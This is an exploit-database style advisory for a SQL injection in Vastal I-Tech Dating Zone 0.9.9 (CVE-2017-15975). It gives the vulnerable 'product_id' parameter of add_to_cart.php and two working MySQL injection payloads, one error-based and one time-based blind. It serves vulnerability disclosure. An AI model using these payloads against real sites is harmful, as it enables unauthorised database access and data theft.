vendor:
Dating Zone
by:
Ihsan Sencan
9,8
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: Dating Zone
Affected Version From: 0.9.9
Affected Version To: 0.9.9
Patch Exists: YES
Related CWE: CVE-2017-15975
CPE: a:vastal_i-tech:dating_zone:0.9.9
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2017
Vastal I-Tech Dating Zone 0.9.9 – ‘product_id’ Parameter SQL Injection
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/add_to_cart.php?product_id=[SQL] Parameter: product_id (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: product_id=3 AND (SELECT 5917 FROM(SELECT COUNT(*),CONCAT(0x7176626a71,(SELECT (ELT(5917=5917,1))),0x71716b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: product_id=3 AND SLEEP(5)
Mitigation:
Input validation and sanitization should be done to prevent SQL injection attacks.